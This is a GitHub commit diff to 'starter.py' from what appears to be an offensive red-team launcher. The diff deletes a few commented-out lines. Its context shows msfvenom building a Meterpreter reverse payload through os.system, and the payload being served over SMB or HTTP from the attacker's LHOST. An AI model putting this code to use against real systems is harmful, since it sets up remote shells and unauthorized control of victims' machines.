Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
F1t1 authored Sep 19, 2019
1 parent deca077 commit 714a939
Showing 1 changed file with 0 additions and 6 deletions.
6 changes: 0 additions & 6 deletions Standalone/starter.py
Original file line number Diff line number Diff line change
Expand Up @@ -71,7 +71,6 @@ def createPayload(password):
lport = raw_input("Select LPORT: ")

#msfvenom creation
#subprocess.call(["msfvenom", "-p", payload, "LHOST=" + lhost, "LPORT=" + lport, "-f", "raw", ">", "meter"])
command = "msfvenom -p " + payload + " LHOST=" + lhost + " LPORT=" + lport + " -f raw > meter"
print("[*] Generating payload " + command)
os.system(command)
Expand Down Expand Up @@ -143,8 +142,6 @@ def main():

if function == "8": #Meterpreter
lhost,lport = createPayload(password)
#lhost = "a"
#lhost = "b"
print("How do you want to serve your payload? ")
mode = setServingMode()
if mode == "1": #SMB
Expand All @@ -169,9 +166,6 @@ def main():
else:
path = "http://" + lhost + "/elmal.txt"
writeFile(password,path,"silenttrinity",url)

#elif function == "4": #Reverse ICMP
#elif function == "5": #Reverse DNS
else:
print("Enter your IP: ")
lhost = raw_input()
Expand Down

0 comments on commit 714a939

Please sign in to comment.